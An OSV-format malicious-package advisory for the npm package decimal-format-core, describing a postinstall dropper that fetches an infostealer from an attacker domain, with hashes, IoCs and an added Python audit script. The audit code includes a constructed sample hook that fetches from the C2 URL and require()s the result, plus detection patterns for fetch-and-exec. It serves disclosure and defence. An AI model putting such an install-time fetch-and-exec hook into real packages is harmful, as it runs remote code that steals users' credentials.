mal-2026-6689
Vulnerability from ossf_malicious_packages
Published: 2026-06-30 00:00
Modified: 2026-06-30 21:37
Summary
Malicious code in decimal-format-core (npm)
Details

Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign. decimal-format-core uses a dropper technique: a postinstall hook executes scripts/install-check.cjs at install time, which fetches a second-stage infostealer payload from the C2 domain logstream-api.online. The infostealer harvests cryptocurrency wallet vaults (MetaMask, Phantom, Solflare, OKX, Coinbase, TrustWallet, Backpack, TronLink), Chrome/Firefox/Brave cookies and credentials, SSH keys, AWS credentials, .npmrc tokens, Docker config, shell history, and password manager databases, then exfiltrates the data to the attacker-controlled server.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (41dcb1eea736b0aba6c078a55b8b60553925e6981452e5c4f56e57e419801f87)

On npm install, the package's postinstall script (scripts/install-check.cjs) fetches a JSON config from https://logstream-api.online/config/dfc-sync.json, reads a peerBundle URL from it, downloads a tarball to a temp directory, extracts it into a .peer/ directory, runs npm install inside the extracted tree, then require()s the extracted peer-math.js module and invokes syncSession(). The fetched payload is not pinned, hashed, or signature-verified, and the source host is fully attacker-controlled and mutable. This executes arbitrary remote code in the installer's context as a default consequence of npm install. The package presents itself with the description 'Logform-style numeric and text formatting utilities for Node.js loggers' and the keywords (logform, logger, format) to target users searching for the legitimate logform logging library, while the README frames the remote fetch-and-exec as a benign 'Enterprise sync / peer bundle' feature; the path runs by default with no opt-in because resolvePeerBundleUrl falls through to the hardcoded homepage URL when the env vars are unset.
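As an added example (not part of this advisory, the package, or either finder's tooling), a small Python audit that flags package.json install-time lifecycle hooks whose script combines network access with code loading or execution, and that matches a supplied IoC domain list. The sample package.json, hook source and domain list below are constructed to mirror the dropper pattern the advisory describes; a real run would read them from an unpacked tarball.

```python
import json
import re

# Constructed sample manifest and hook, modelled on the advisory's description
# (a postinstall hook that fetches a remote bundle and require()s it).
# These are NOT the real package contents.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg",
    "version": "1.0.0",
    "scripts": {"postinstall": "node scripts/install-check.cjs"},
})
SAMPLE_HOOK_SOURCE = """
const https = require('https');
const url = process.env.PEER_BUNDLE_URL || 'https://logstream-api.online/config/dfc-sync.json';
https.get(url, (res) => { /* download, extract, then */ require('./peer-math.js'); });
"""

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
NETWORK_PATTERNS = (r"\bhttps?\.get\b", r"\bfetch\s*\(", r"https?://[\w.-]+")
EXEC_PATTERNS = (r"\brequire\s*\(", r"\bchild_process\b",
                 r"\bexec(Sync)?\s*\(", r"\bspawn\s*\(", r"\|\s*(ba)?sh\b")

def lifecycle_scripts(package_json_text):
    """Return {hook: command} for the install-time lifecycle hooks in a package.json."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}

def hook_risk_indicators(source, ioc_domains=()):
    """Classify hook source: network access, code loading/exec, and known IoC domains."""
    found = []
    if any(re.search(p, source) for p in NETWORK_PATTERNS):
        found.append("network")
    if any(re.search(p, source) for p in EXEC_PATTERNS):
        found.append("exec")
    found.extend(f"ioc:{d}" for d in ioc_domains if d in source)
    return found

def audit_package(package_json_text, hook_sources, ioc_domains=()):
    """hook_sources maps script path -> source text. Returns a list of findings."""
    findings = []
    for hook, cmd in lifecycle_scripts(package_json_text).items():
        # Scan the script files the hook command references; if it references
        # none (e.g. an inline curl | sh), scan the command line itself.
        targets = [(p, s) for p, s in hook_sources.items() if p in cmd] or [("<inline>", cmd)]
        for path, src in targets:
            ind = hook_risk_indicators(src, ioc_domains)
            fetch_and_exec = "network" in ind and "exec" in ind
            if fetch_and_exec or any(i.startswith("ioc:") for i in ind):
                findings.append({"hook": hook, "script": path, "indicators": ind})
    return findings
```

A hit means "inspect this package before installing", not proof of malice; legitimate native-build hooks can also touch the network, so the IoC match is the higher-confidence signal.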

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "scripts/install-check.cjs",
              "sha256": "4f384fe4808beea005a2d50e4dc6ba8b1fab3fbd669bc12203b72e30ecbc0fa5",
              "tlsh": "ffa1359919a272734ab1ebb8c722941dff1340233521c360f6de96952fb72a4c352dec"
            },
            {
              "path": "package.json",
              "sha256": "1518c8f4a560d8a4e75a08b60c300075c3661ebb73b61d326e7b9196161037e2",
              "tlsh": "50f08b60db180e332ce94e55489a52016aa58ed70a843c0a73d3610c8f8d67b05ff24e"
            }
          ],
          "package_integrity": [
            {
              "filename": "decimal-format-core-3.5.3.tgz",
              "hashes": {
                "sha1": "8c8aab3306761d72a6b351a8f2054938d01aef81",
                "sha512_sri": "sha512-IauqZcUdFWIgK9kfIMCVnaHTsr/KoknMw7T7E9snQnExX70wRJE51zGg1aG2seGvm3smC/HAJ7IMK3m3Y5gBig=="
              }
            }
          ]
        },
        "iocs": {
          "domains": [
            "logstream-api.online"
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "decimal-format-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "versions": [
        "3.5.3",
        "3.5.2"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://safedep.io"
      ],
      "name": "SafeDep",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007812",
        "import_time": "2026-06-30T21:35:49.457963069Z",
        "modified_time": "2026-06-30T20:58:36Z",
        "sha256": "7b2044c0f0e89b9329d67d82ec5e5308318aa06503c4e7c2065f9211d00159d2",
        "source": "amazon-inspector",
        "versions": [
          "3.5.3"
        ]
      },
      {
        "id": "IN-MAL-2026-007811",
        "import_time": "2026-06-30T21:35:49.345220775Z",
        "modified_time": "2026-06-30T20:58:25Z",
        "sha256": "41dcb1eea736b0aba6c078a55b8b60553925e6981452e5c4f56e57e419801f87",
        "source": "amazon-inspector",
        "versions": [
          "3.5.2"
        ]
      }
    ]
  },
  "details": "Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign. `decimal-format-core` uses a dropper technique: a `postinstall` hook executes `scripts/install-check.cjs` at install time, which fetches a second-stage infostealer payload from the C2 domain `logstream-api.online`. The infostealer harvests cryptocurrency wallet vaults (MetaMask, Phantom, Solflare, OKX, Coinbase, TrustWallet, Backpack, TronLink), Chrome/Firefox/Brave cookies and credentials, SSH keys, AWS credentials, `.npmrc` tokens, Docker config, shell history, and password manager databases, then exfiltrates the data to the attacker-controlled server.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (41dcb1eea736b0aba6c078a55b8b60553925e6981452e5c4f56e57e419801f87)\nOn npm install, the package\u0027s postinstall script (scripts/install-check.cjs) fetches a JSON config from https://logstream-api.online/config/dfc-sync.json, reads a peerBundle URL from it, downloads a tarball to a temp directory, extracts it into a.peer/ directory, runs `npm install` inside the extracted tree, then require()s the extracted peer-math.js module and invokes syncSession(). The fetched payload is not pinned, hashed, or signature-verified, and the source host is fully attacker-controlled and mutable. This executes arbitrary remote code in the installer\u0027s context as a default consequence of `npm install`. The package presents itself with description \u0027Logform-style numeric and text formatting utilities for Node.js loggers\u0027 and keywords (logform, logger, format) that target users searching for the legitimate logform logging library, while the README frames the remote fetch-and-exec as a benign \u0027Enterprise sync / peer bundle\u0027 feature; the path runs by default with no opt-in because resolvePeerBundleUrl falls through to the hardcoded homepage URL when env vars are unset.\n",
  "id": "MAL-2026-6689",
  "modified": "2026-06-30T21:37:38Z",
  "published": "2026-06-30T00:00:00Z",
  "references": [
    {
      "type": "REPORT",
      "url": "https://safedep.io/defi-infostealer-fake-arbitrage-bot-npm/"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/decimal-format-core/v/3.5.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/decimal-format-core/v/3.5.2"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in decimal-format-core (npm)"
}

